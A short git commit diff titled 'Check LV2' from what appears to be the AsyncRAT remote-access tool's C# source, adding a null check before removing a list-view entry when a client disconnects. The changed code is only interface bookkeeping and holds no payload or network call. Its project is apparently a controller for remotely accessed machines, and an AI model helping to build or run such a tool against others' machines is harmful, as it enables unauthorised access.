Check LV2

This commit is contained in:
NYAN CAT 2019-06-02 10:11:20 +03:00
parent 492c47cf59
commit c16203548f

View File

@ -123,13 +123,20 @@ namespace AsyncRAT_Sharp.Sockets
{ {
try try
{ {
lock (Settings.Listview1Lock) lock (Settings.Listview1Lock)
LV.Remove(); LV.Remove();
lock (Settings.Listview3Lock)
LV2?.Remove(); if (LV2 != null)
{
lock (Settings.Listview3Lock)
LV2.Remove();
}
} }
catch { } catch { }
})); }));
lock (Settings.Online) lock (Settings.Online)
Settings.Online.Remove(this); Settings.Online.Remove(this);
} }